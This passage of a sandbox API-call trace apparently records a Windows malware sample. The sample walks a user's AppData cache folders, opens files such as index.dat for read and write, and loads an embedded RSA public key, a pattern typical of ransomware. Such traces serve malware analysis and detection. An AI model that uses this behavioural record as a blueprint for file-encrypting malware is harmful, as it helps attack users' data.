HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0237.114] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.114] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0237.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0237.115] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.115] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0237.116] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0237.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.116] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0237.116] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185fa8 | out: hHeap=0x630000) returned 1 [0237.117] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.117] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0237.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0237.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0237.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.117] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.117] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.117] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.117] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.117] PathFindFileNameW (pszPath="") returned="" [0237.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185cc8 | out: hHeap=0x630000) returned 1 [0237.119] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.119] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36USA68T", cAlternateFileName="")) returned 1 [0237.119] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3O75JDME", cAlternateFileName="")) returned 1 [0237.119] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbaf619f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0237.119] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0237.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.120] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=32768) returned 1 [0237.120] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.123] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.123] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.125] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.125] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x8000, lpOverlapped=0x0) returned 1 [0237.127] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.127] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.127] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.127] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.128] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.128] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.128] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.128] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.128] GetLastError () returned 0x0 [0237.128] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.128] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.129] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.129] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.129] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8000) returned 0x37cf820 [0237.129] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf210 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc960 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf258 [0237.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc978 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9a8 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc9c0 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.130] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca08 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc9c0 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc9a8 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.130] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9c0 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc9a8 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca08 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.131] GetCurrentThreadId () returned 0x314 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c68c0 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0237.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.132] GetCurrentThreadId () returned 0x314 [0237.132] RtlAllocateHeap 